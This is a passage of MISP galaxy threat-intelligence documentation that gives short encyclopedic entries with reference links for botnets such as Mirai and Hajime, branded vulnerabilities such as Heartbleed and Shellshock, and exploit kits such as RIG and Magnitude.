<h3 id="_chameleon"><a class="anchor" href="#_chameleon"></a><a class="link" href="#_chameleon">Chameleon</a></h3>
<div class="paragraph">
<p>The Chameleon botnet is a botnet that was discovered on February 28, 2013 by the security research firm, spider.io. It involved the infection of more than 120,000 computers and generated, on average, 6 million US dollars per month from advertising traffic. This traffic was generated on infected systems and looked to advertising parties as regular end users which browsed the Web, because of which it was seen as legitimate web traffic. The affected computers were all Windows PCs with the majority being private PCs (residential systems).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 498. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Chameleon_botnet">https://en.wikipedia.org/wiki/Chameleon_botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mirai"><a class="anchor" href="#_mirai"></a><a class="link" href="#_mirai">Mirai</a></h3>
<div class="paragraph">
<p>Mirai (Japanese for "the future", 未来) is a malware that turns networked devices running Linux into remotely controlled "bots" that can be used as part of a botnet in large-scale network attacks. It primarily targets online consumer devices such as IP cameras and home routers. The Mirai botnet was first found in August 2016 by MalwareMustDie, a whitehat malware research group, and has been used in some of the largest and most disruptive distributed denial of service (DDoS) attacks, including an attack on 20 September 2016 on computer security journalist Brian Krebs&#8217;s web site, an attack on French web host OVH, and the October 2016 Dyn cyberattack.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 499. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Mirai_(malware)">https://en.wikipedia.org/wiki/Mirai_(malware)</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_satori"><a class="anchor" href="#_satori"></a><a class="link" href="#_satori">Satori</a></h3>
<div class="paragraph">
<p>According to a report Li shared with Bleeping Computer today, the Mirai Satori variant is quite different from all previous pure Mirai variants.Previous Mirai versions infected IoT devices and then downloaded a Telnet scanner component that attempted to find other victims and infect them with the Mirai bot.The Satori variant does not use a scanner but uses two embedded exploits that will try to connect to remote devices on ports 37215 and 52869.Effectively, this makes Satori an IoT worm, being able to spread by itself without the need for separate components.</p>
</div>
<div class="paragraph">
<p>Satori is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Okiru</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 500. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/satori-botnet-has-sudden-awakening-with-over-280-000-active-bots/">https://www.bleepingcomputer.com/news/security/satori-botnet-has-sudden-awakening-with-over-280-000-active-bots/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fortinet.com/2017/12/12/rise-of-one-more-mirai-worm-variant">https://blog.fortinet.com/2017/12/12/rise-of-one-more-mirai-worm-variant</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_betabot"><a class="anchor" href="#_betabot"></a><a class="link" href="#_betabot">BetaBot</a></h3>
</div>
<div class="sect2">
<h3 id="_hajime"><a class="anchor" href="#_hajime"></a><a class="link" href="#_hajime">Hajime</a></h3>
<div class="paragraph">
<p>Hajime (meaning beginning in Japanese) is an IoT worm that was first mentioned on 16 October 2016 in a public report by RapidityNetworks. One month later we saw the first samples being uploaded from Spain to VT. This worm builds a huge P2P botnet (almost 300,000 devices at the time of publishing this blogpost), but its real purpose remains unknown.
It is worth mentioning that in the past, the Hajime IoT botnet was never used for massive DDoS attacks, and its existance was a mystery for many researchers, as the botnet only gathered infected devices but almost never did anything with them (except scan for other vulnerable devices).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 501. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/hajime-botnet-makes-a-comeback-with-massive-scan-for-mikrotik-routers/">https://www.bleepingcomputer.com/news/security/hajime-botnet-makes-a-comeback-with-massive-scan-for-mikrotik-routers/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Hajime_(malware)">https://en.wikipedia.org/wiki/Hajime_(malware)</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/hajime-the-mysterious-evolving-botnet/78160/">https://securelist.com/hajime-the-mysterious-evolving-botnet/78160/</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_branded_vulnerability"><a class="anchor" href="#_branded_vulnerability"></a><a class="link" href="#_branded_vulnerability">Branded Vulnerability</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>List of known vulnerabilities and attacks with a branding.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Branded Vulnerability is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/branded" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/branded</a> vulnerability.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>Unknown</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_meltdown"><a class="anchor" href="#_meltdown"></a><a class="link" href="#_meltdown">Meltdown</a></h3>
<div class="paragraph">
<p>Meltdown exploits the out-of-order execution feature of modern processors, allowing user-level programs to access kernel memory using processor caches as covert side channels. This is specific to the way out-of-order execution is implemented in the processors. This vulnerability has been assigned CVE-2017-5754.</p>
</div>
</div>
<div class="sect2">
<h3 id="_spectre"><a class="anchor" href="#_spectre"></a><a class="link" href="#_spectre">Spectre</a></h3>
<div class="paragraph">
<p>Spectre exploits the speculative execution feature that is present in almost all processors in existence today. Two variants of Spectre are known and seem to depend on what is used to influence erroneous speculative execution. The first variant triggers speculative execution by performing a bounds check bypass and has been assigned CVE-2017-5753. The second variant uses branch target injection for the same effect and has been assigned CVE-2017-5715.</p>
</div>
</div>
<div class="sect2">
<h3 id="_heartbleed"><a class="anchor" href="#_heartbleed"></a><a class="link" href="#_heartbleed">Heartbleed</a></h3>
<div class="paragraph">
<p>Heartbleed is a security bug in the OpenSSL cryptography library, which is a widely used implementation of the Transport Layer Security (TLS) protocol. It was introduced into the software in 2012 and publicly disclosed in April 2014. Heartbleed may be exploited regardless of whether the vulnerable OpenSSL instance is running as a TLS server or client. It results from improper input validation (due to a missing bounds check) in the implementation of the TLS heartbeat extension, thus the bug&#8217;s name derives from heartbeat. The vulnerability is classified as a buffer over-read,[5] a situation where more data can be read than should be allowed.</p>
</div>
</div>
<div class="sect2">
<h3 id="_shellshock"><a class="anchor" href="#_shellshock"></a><a class="link" href="#_shellshock">Shellshock</a></h3>
<div class="paragraph">
<p>Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.</p>
</div>
</div>
<div class="sect2">
<h3 id="_ghost"><a class="anchor" href="#_ghost"></a><a class="link" href="#_ghost">Ghost</a></h3>
<div class="paragraph">
<p>The GHOST vulnerability is a serious weakness in the Linux glibc library. It allows attackers to remotely take complete control of the victim system without having any prior knowledge of system credentials. CVE-2015-0235 has been assigned to this issue.
During a code audit Qualys researchers discovered a buffer overflow in the __nss_hostname_digits_dots() function of glibc. This bug can be triggered both locally and remotely via all the gethostbyname*() functions. Applications have access to the DNS resolver primarily through the gethostbyname*() set of functions. These functions convert a hostname into an IP address.</p>
</div>
</div>
<div class="sect2">
<h3 id="_stagefright"><a class="anchor" href="#_stagefright"></a><a class="link" href="#_stagefright">Stagefright</a></h3>
<div class="paragraph">
<p>Stagefright is the name given to a group of software bugs that affect versions 2.2 ("Froyo") and newer of the Android operating system. The name is taken from the affected library, which among other things, is used to unpack MMS messages. Exploitation of the bug allows an attacker to perform arbitrary operations on the victim&#8217;s device through remote code execution and privilege escalation. Security researchers demonstrate the bugs with a proof of concept that sends specially crafted MMS messages to the victim device and in most cases requires no end-user actions upon message reception to succeed—the user doesnt have to do anything to accept the bug, it happens in the background. The phone number is the only target information.</p>
</div>
</div>
<div class="sect2">
<h3 id="_badlock"><a class="anchor" href="#_badlock"></a><a class="link" href="#_badlock">Badlock</a></h3>
<div class="paragraph">
<p>Badlock is a security bug disclosed on April 12, 2016 affecting the Security Account Manager (SAM) and Local Security Authority (Domain Policy) (LSAD) remote protocols[1] supported by Windows and Samba servers.</p>
</div>
</div>
<div class="sect2">
<h3 id="_dirty_cow"><a class="anchor" href="#_dirty_cow"></a><a class="link" href="#_dirty_cow">Dirty COW</a></h3>
<div class="paragraph">
<p>Dirty COW (Dirty copy-on-write) is a computer security vulnerability for the Linux kernel that affects all Linux-based operating systems including Android. It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel&#8217;s memory-management subsystem. The vulnerability was discovered by Phil Oester. Because of the race condition, with the right timing, a local attacker can exploit the copy-on-write mechanism to turn a read-only mapping of a file into a writable mapping. Although it is a local privilege escalation, remote attackers can use it in conjunction with other exploits that allow remote execution of non-privileged code to achieve remote root access on a computer. The attack itself does not leave traces in the system log.</p>
</div>
</div>
<div class="sect2">
<h3 id="_poodle"><a class="anchor" href="#_poodle"></a><a class="link" href="#_poodle">POODLE</a></h3>
<div class="paragraph">
<p>The POODLE attack (which stands for "Padding Oracle On Downgraded Legacy Encryptio") is a man-in-the-middle exploit which takes advantage of Internet and security software clients' fallback to SSL 3.0. If attackers successfully exploit this vulnerability, on average, they only need to make 256 SSL 3.0 requests to reveal one byte of encrypted messages. Bodo Möller, Thai Duong and Krzysztof Kotowicz from the Google Security Team discovered this vulnerability; they disclosed the vulnerability publicly on October 14, 2014 (despite the paper being dated "September 2014" ). Ivan Ristic does not consider the POODLE attack as serious as the Heartbleed and Shellshock attacks. On December 8, 2014 a variation of the POODLE vulnerability that affected TLS was announced.</p>
</div>
</div>
<div class="sect2">
<h3 id="_badusb"><a class="anchor" href="#_badusb"></a><a class="link" href="#_badusb">BadUSB</a></h3>
<div class="paragraph">
<p>The BadUSB vulnerability exploits unprotected firmware in order to deliver malicious code to computers and networks. This is achieved by reverse-engineering the device and reprogramming it. As the reprogrammed firmware is not monitored or assessed by modern security software, this attack method is extremely difficult for antivirus/security software to detect and prevent.</p>
</div>
</div>
<div class="sect2">
<h3 id="_imagetragick"><a class="anchor" href="#_imagetragick"></a><a class="link" href="#_imagetragick">ImageTragick</a></h3>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_cert_eu_govsector"><a class="anchor" href="#_cert_eu_govsector"></a><a class="link" href="#_cert_eu_govsector">Cert EU GovSector</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Cert EU GovSector.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Cert EU GovSector is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/cert" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/cert</a> eu govsector.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>Various</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_constituency"><a class="anchor" href="#_constituency"></a><a class="link" href="#_constituency">Constituency</a></h3>
</div>
<div class="sect2">
<h3 id="_eu_centric"><a class="anchor" href="#_eu_centric"></a><a class="link" href="#_eu_centric">EU-Centric</a></h3>
</div>
<div class="sect2">
<h3 id="_eu_nearby"><a class="anchor" href="#_eu_nearby"></a><a class="link" href="#_eu_nearby">EU-nearby</a></h3>
</div>
<div class="sect2">
<h3 id="_world_class"><a class="anchor" href="#_world_class"></a><a class="link" href="#_world_class">World-class</a></h3>
</div>
<div class="sect2">
<h3 id="_unknown"><a class="anchor" href="#_unknown"></a><a class="link" href="#_unknown">Unknown</a></h3>
</div>
<div class="sect2">
<h3 id="_outside_world"><a class="anchor" href="#_outside_world"></a><a class="link" href="#_outside_world">Outside World</a></h3>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_exploit_kit"><a class="anchor" href="#_exploit_kit"></a><a class="link" href="#_exploit_kit">Exploit-Kit</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Exploit-Kit is an enumeration of some exploitation kits used by adversaries. The list includes document, browser and router exploit kits.It&#8217;s not meant to be totally exhaustive but aim at covering the most seen in the past 5 years.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Exploit-Kit is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/exploit-kit.json"><strong>this location</strong></a> The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>Kafeine - Will Metcalf - KahuSecurity</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_astrum"><a class="anchor" href="#_astrum"></a><a class="link" href="#_astrum">Astrum</a></h3>
<div class="paragraph">
<p>Astrum Exploit Kit is a private Exploit Kit used in massive scale malvertising campaigns. It&#8217;s notable by its use of Steganography</p>
</div>
<div class="paragraph">
<p>Astrum is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Stegano EK</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 502. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2014/09/astrum-ek.html">http://malware.dontneedcoffee.com/2014/09/astrum-ek.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/2016/12/06/readers-popular-websites-targeted-stealthy-stegano-exploit-kit-hiding-pixels-malicious-ads/">http://www.welivesecurity.com/2016/12/06/readers-popular-websites-targeted-stealthy-stegano-exploit-kit-hiding-pixels-malicious-ads/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bingo"><a class="anchor" href="#_bingo"></a><a class="link" href="#_bingo">Bingo</a></h3>
<div class="paragraph">
<p>Bingo EK is the name chosen by the defense for a Fiesta-ish EK first spotted in March 2017 and targetting at that times mostly Russia</p>
</div>
</div>
<div class="sect2">
<h3 id="_terror_ek"><a class="anchor" href="#_terror_ek"></a><a class="link" href="#_terror_ek">Terror EK</a></h3>
<div class="paragraph">
<p>Terror EK is built on Hunter, Sundown and RIG EK code</p>
</div>
<div class="paragraph">
<p>Terror EK is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Blaze EK</p>
</li>
<li>
<p>Neptune EK</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 503. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Terror-Exploit-Kit&#8212;&#8203;More-like-Error-Exploit-Kit/">https://www.trustwave.com/Resources/SpiderLabs-Blog/Terror-Exploit-Kit&#8212;&#8203;More-like-Error-Exploit-Kit/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dealerschoice"><a class="anchor" href="#_dealerschoice"></a><a class="link" href="#_dealerschoice">DealersChoice</a></h3>
<div class="paragraph">
<p>DealersChoice is a Flash Player Exploit platform triggered by RTF.</p>
</div>
<div class="paragraph">
<p>DealersChoice is a platform that generates malicious documents containing embedded Adobe Flash files. Palo Alto Network researchers analyzed two variantsvariant A, which is a standalone variant including Flash exploit code packaged with a payload, and variant B, which is a modular variant that loads exploit code on demand. This new component appeared in 2016 and is still in use.</p>
</div>
<div class="paragraph">
<p>DealersChoice is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sednit RTF EK</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 504. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/10/unit42-dealerschoice-sofacys-flash-player-exploit-platform/">http://researchcenter.paloaltonetworks.com/2016/10/unit42-dealerschoice-sofacys-flash-player-exploit-platform/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-ramps-up-spear-phishing-before-zero-days-get-patched/">http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-ramps-up-spear-phishing-before-zero-days-get-patched/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/">https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dnschanger"><a class="anchor" href="#_dnschanger"></a><a class="link" href="#_dnschanger">DNSChanger</a></h3>
<div class="paragraph">
<p>DNSChanger Exploit Kit is an exploit kit targeting Routers via the browser</p>
</div>
<div class="paragraph">
<p>DNSChanger is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RouterEK</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 505. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html">http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices">https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_disdain"><a class="anchor" href="#_disdain"></a><a class="link" href="#_disdain">Disdain</a></h3>
<div class="paragraph">
<p>Disdain EK has been introduced on underground forum on 2017-08-07. The panel is stolen from Sundown, the pattern are Terror alike and the obfuscation reminds Nebula</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 506. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/new-disdain-exploit-kit-detected-wild/">http://blog.trendmicro.com/trendlabs-security-intelligence/new-disdain-exploit-kit-detected-wild/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kaixin"><a class="anchor" href="#_kaixin"></a><a class="link" href="#_kaixin">Kaixin</a></h3>
<div class="paragraph">
<p>Kaixin is an exploit kit mainly seen behind compromised website in Asia</p>
</div>
<div class="paragraph">
<p>Kaixin is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CK vip</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 507. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.kahusecurity.com/2013/deobfuscating-the-ck-exploit-kit/">http://www.kahusecurity.com/2013/deobfuscating-the-ck-exploit-kit/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.kahusecurity.com/2012/new-chinese-exploit-pack/">http://www.kahusecurity.com/2012/new-chinese-exploit-pack/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_magnitude"><a class="anchor" href="#_magnitude"></a><a class="link" href="#_magnitude">Magnitude</a></h3>
<div class="paragraph">
<p>Magnitude EK</p>
</div>
<div class="paragraph">
<p>Magnitude is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Popads EK</p>
</li>
<li>
<p>TopExp</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 508. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2013/10/Magnitude.html">http://malware.dontneedcoffee.com/2013/10/Magnitude.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/A-Peek-Into-the-Lion-s-Den-%E2%80%93-The-Magnitude&#8212;&#8203;aka-PopAds&#8212;&#8203;Exploit-Kit/">https://www.trustwave.com/Resources/SpiderLabs-Blog/A-Peek-Into-the-Lion-s-Den-%E2%80%93-The-Magnitude&#8212;&#8203;aka-PopAds&#8212;&#8203;Exploit-Kit/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2014/02/and-real-name-of-magnitude-is.html">http://malware.dontneedcoffee.com/2014/02/and-real-name-of-magnitude-is.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://community.rsa.com/community/products/netwitness/blog/2017/02/09/magnitude-exploit-kit-under-the-hood">https://community.rsa.com/community/products/netwitness/blog/2017/02/09/magnitude-exploit-kit-under-the-hood</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mwi"><a class="anchor" href="#_mwi"></a><a class="link" href="#_mwi">MWI</a></h3>
<div class="paragraph">
<p>Microsoft Word Intruder is an exploit kit focused on Word and embedded flash exploits. The author wants to avoid their customer to use it in mass spam campaign, so it&#8217;s most often connected to semi-targeted attacks</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 509. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/04/a_new_word_document.html">https://www.fireeye.com/blog/threat-research/2015/04/a_new_word_document.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.sophos.com/en-us/medialibrary/PDFs/technical%20papers/sophos-microsoft-word-intruder-revealed.pdf">https://www.sophos.com/en-us/medialibrary/PDFs/technical%20papers/sophos-microsoft-word-intruder-revealed.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rig"><a class="anchor" href="#_rig"></a><a class="link" href="#_rig">RIG</a></h3>
<div class="paragraph">
<p>RIG is an exploit kit that takes its source in Infinity EK itself an evolution of Redkit. It became dominant after the fall of Angler, Nuclear Pack and the end of public access to Neutrino. RIG-v is the name given to RIG 4 when it was only accessible by "vip" customers and when RIG 3 was still in use.</p>
</div>
<div class="paragraph">
<p>RIG is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RIG 3</p>
</li>
<li>
<p>RIG-v</p>
</li>
<li>
<p>RIG 4</p>
</li>
<li>
<p>Meadgive</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 510. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.kahusecurity.com/2014/rig-exploit-pack/">http://www.kahusecurity.com/2014/rig-exploit-pack/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/RIG-Reloaded---Examining-the-Architecture-of-RIG-Exploit-Kit-3-0/">https://www.trustwave.com/Resources/SpiderLabs-Blog/RIG-Reloaded---Examining-the-Architecture-of-RIG-Exploit-Kit-3-0/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/RIG-Exploit-Kit-%E2%80%93-Diving-Deeper-into-the-Infrastructure/">https://www.trustwave.com/Resources/SpiderLabs-Blog/RIG-Exploit-Kit-%E2%80%93-Diving-Deeper-into-the-Infrastructure/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html">http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sednit_ek"><a class="anchor" href="#_sednit_ek"></a><a class="link" href="#_sednit_ek">Sednit EK</a></h3>
<div class="paragraph">
<p>Sednit EK is the exploit kit used by APT28</p>
</div>
<div class="paragraph">
<p>Sednit EK is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SedKit</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 511. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-custom-exploit-kit/">http://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-custom-exploit-kit/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/">http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sundown_p"><a class="anchor" href="#_sundown_p"></a><a class="link" href="#_sundown_p">Sundown-P</a></h3>
<div class="paragraph">
<p>Sundown-P/Sundown-Pirate is a rip of Sundown seen used in a private way (One group using it only) - First spotted at the end of June 2017, branded as CaptainBlack in August 2017</p>
</div>
<div class="paragraph">
<p>Sundown-P is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sundown-Pirate</p>
</li>
<li>
<p>CaptainBlack</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 512. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/promediads-malvertising-sundown-pirate-exploit-kit/">http://blog.trendmicro.com/trendlabs-security-intelligence/promediads-malvertising-sundown-pirate-exploit-kit/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bizarro_sundown"><a class="anchor" href="#_bizarro_sundown"></a><a class="link" href="#_bizarro_sundown">Bizarro Sundown</a></h3>
<div class="paragraph">
<p>Bizarro Sundown appears to be a fork of Sundown with added anti-analysis features</p>
</div>
<div class="paragraph">
<p>Bizarro Sundown is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sundown-b</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 513. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
